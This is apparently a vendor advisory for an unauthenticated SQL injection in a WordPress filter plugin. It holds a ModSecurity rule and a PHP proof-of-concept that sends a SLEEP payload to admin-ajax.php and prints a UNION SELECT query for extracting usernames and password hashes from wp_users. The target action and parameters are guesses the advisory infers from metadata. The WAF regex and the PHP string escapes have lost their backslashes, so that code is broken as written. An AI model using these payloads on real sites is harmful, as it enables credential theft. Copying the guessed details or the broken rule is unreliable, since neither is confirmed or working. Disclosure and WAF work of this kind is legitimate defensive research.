Atomic Edge analysis of CVE-2026-54843 (metadata-based): This vulnerability allows unauthenticated attackers to perform SQL injection against the MDTF – Meta Data and Taxonomies Filter plugin for WordPress, version 1.3.7 and earlier. The CVSS score is 7.5 (High), with network attack vector, low complexity, and no authentication required. The impact is limited to confidentiality (high), with no impact on integrity or availability.
Atomic Edge research infers the root cause from the CWE-89 classification and the vulnerability description. The plugin fails to properly escape user-supplied parameters and does not use prepared statements when building SQL queries. This is a classic SQL injection vulnerability where attacker-controlled input is concatenated directly into SQL statements. Since no code diff is available, Atomic Edge analysis cannot confirm the exact parameter or query structure, but the CWE description strongly suggests the plugin uses $wpdb->query() or $wpdb->get_results() with unsanitized input rather than $wpdb->prepare().
Exploitation is likely achieved through the plugin’s AJAX or REST endpoints used for filtering. Based on the plugin slug ‘wp-meta-data-filter-and-taxonomy-filter’, the vulnerable action is likely ‘mdf_filter_data’ or similar. An unauthenticated attacker sends a POST request to /wp-admin/admin-ajax.php with action=mdf_filter_data and a malicious SQL payload in one of the filter parameters (e.g., meta_key, meta_value, or tax_query). The attacker uses UNION-based or time-based blind SQL injection techniques to extract database contents. Example payloads include ‘ UNION SELECT user_pass FROM wp_users– or sleep(5) in the parameter value.
Remediation requires the vendor to use parameterized queries (prepared statements) with $wpdb->prepare() for all database operations. The plugin must escape all user-supplied parameters using esc_sql() or pass them as placeholder values in prepared statements. Atomic Edge recommends updating to version 1.3.8 or higher immediately.
The impact of successful exploitation is severe: an attacker can extract sensitive information from the WordPress database, including user credentials (hashed passwords), email addresses, session tokens, and potentially configuration data. This can lead to account takeover and further compromise of the WordPress site.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-54843 (metadata-based)
# Block unauthenticated SQL injection attempts against MDTF plugin AJAX handler
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php"
"id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-54843 MDTF SQL Injection Attempt Detected',severity:'CRITICAL',tag:'CVE-2026-54843'"
SecRule ARGS_POST:action "@streq mdf_filter_data" "chain"
SecRule ARGS_POST:meta_key "@rx (bunionb.*bselectb|bsleepb(|bbenchmarkb(|bwaitforb|bpg_sleepb|bselectb.*bfromb.*bfromb|'s*ors*'1'='1|'s*ands*'1'='1)"
"t:lowercase,t:urlDecode"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-54843 - MDTF – Meta Data and Taxonomies Filter <= 1.3.7 - Unauthenticated SQL Injection
$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress URL
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
// Step 1: Test for basic SQL injection detection (error-based or time-based)
// The plugin likely uses an action like 'mdf_filter_data' for filter processing
// We inject a time-based payload to confirm vulnerability without causing damage
$payload = "1' AND (SELECT 1234 FROM (SELECT(SLEEP(3)))a) AND '1'='1";
$post_data = array(
'action' => 'mdf_filter_data',
'meta_key' => $payload
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$start_time = microtime(true);
$response = curl_exec($ch);
$end_time = microtime(true);
curl_close($ch);
$execution_time = $end_time - $start_time;
echo "[Atomic Edge] Testing CVE-2026-54843 on $target_urln";
if ($execution_time >= 3) {
echo "[VULNERABLE] SQL injection confirmed: time-based payload caused delay of " . round($execution_time, 2) . " seconds.n";
echo "[INFO] Extract data using UNION-based injection: http://example.com/wp-admin/admin-ajax.php?action=mdf_filter_data&meta_key=1' UNION SELECT user_login,user_pass FROM wp_users-- -n";
} else {
echo "[NOT VULNERABLE OR DIFFERENT PARAMETER] Execution time: " . round($execution_time, 2) . " seconds.n";
echo "[INFO] Try alternative parameters: meta_value, tax_query, term_id, post_typen";
}
?>
